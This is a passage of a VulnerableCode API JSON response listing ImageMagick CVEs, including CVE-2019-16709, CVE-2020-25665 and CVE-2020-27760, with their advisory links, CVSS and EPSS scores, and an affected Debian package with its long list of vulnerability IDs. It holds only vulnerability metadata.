"VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2021-3574" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-djqz-f6k5-fqfj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82054?format=api", "vulnerability_id": "VCID-ezcj-2yaf-rfhh", "summary": "ImageMagick: memory leak in coders/dps.c", "references": [ { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00045.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00045.html" }, { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00046.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00046.html" }, { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html" }, { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html" }, { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-16709.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-16709.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-16709", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00188", "scoring_system": "epss", "scoring_elements": "0.40569", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00188", "scoring_system": "epss", "scoring_elements": "0.40457", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00188", "scoring_system": "epss", "scoring_elements": "0.40668", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00188", "scoring_system": "epss", "scoring_elements": "0.40637", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00188", "scoring_system": "epss", "scoring_elements": "0.40559", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00188", "scoring_system": "epss", "scoring_elements": "0.40651", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00188", "scoring_system": "epss", "scoring_elements": "0.40679", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00188", "scoring_system": "epss", "scoring_elements": "0.40599", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00188", "scoring_system": "epss", "scoring_elements": "0.4065", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00188", "scoring_system": "epss", "scoring_elements": "0.40659", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00188", "scoring_system": "epss", "scoring_elements": "0.40677", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00188", "scoring_system": "epss", "scoring_elements": "0.4064", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00188", "scoring_system": "epss", "scoring_elements": "0.40622", "published_at": "2026-04-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-16709" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16709", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16709" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/issues/1531", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/issues/1531" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1801661", "reference_id": "1801661", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1801661" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-35:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-35:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-35:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:backports:sle-15:-:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:backports:sle-15:-:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:backports:sle-15:-:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:backports:sle-15:sp1:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:backports:sle-15:sp1:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:backports:sle-15:sp1:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16709", "reference_id": "CVE-2019-16709", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:M/Au:N/C:N/I:N/A:P" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16709" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-16709" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ezcj-2yaf-rfhh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82014?format=api", "vulnerability_id": "VCID-fzhr-jhhc-m3ej", "summary": "ImageMagick: heap-based buffer overflow in WritePALMImage in coders/palm.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-25665.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-25665.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-25665", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47047", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47117", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47112", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.4706", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54488", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54509", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54503", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54515", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54497", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54476", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54387", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54456", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54465", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-25665" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25665", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25665" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1891606", "reference_id": "1891606", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1891606" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/5335-1/", "reference_id": "USN-5335-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5335-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-25665" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fzhr-jhhc-m3ej" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82017?format=api", "vulnerability_id": "VCID-g1ct-6d28-g3ab", "summary": "ImageMagick: division by zero at MagickCore/enhance.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27760.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27760.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27760", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00156", "scoring_system": "epss", "scoring_elements": "0.36307", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00156", "scoring_system": "epss", "scoring_elements": "0.36483", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00156", "scoring_system": "epss", "scoring_elements": "0.36517", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00156", "scoring_system": "epss", "scoring_elements": "0.36355", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00156", "scoring_system": "epss", "scoring_elements": "0.36405", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00156", "scoring_system": "epss", "scoring_elements": "0.36425", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00156", "scoring_system": "epss", "scoring_elements": "0.36432", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00156", "scoring_system": "epss", "scoring_elements": "0.36397", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00156", "scoring_system": "epss", "scoring_elements": "0.36375", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00156", "scoring_system": "epss", "scoring_elements": "0.36416", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00156", "scoring_system": "epss", "scoring_elements": "0.36399", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00156", "scoring_system": "epss", "scoring_elements": "0.36344", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00156", "scoring_system": "epss", "scoring_elements": "0.3612", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27760" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27760", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27760" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894239", "reference_id": "1894239", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894239" }, { "reference_url": 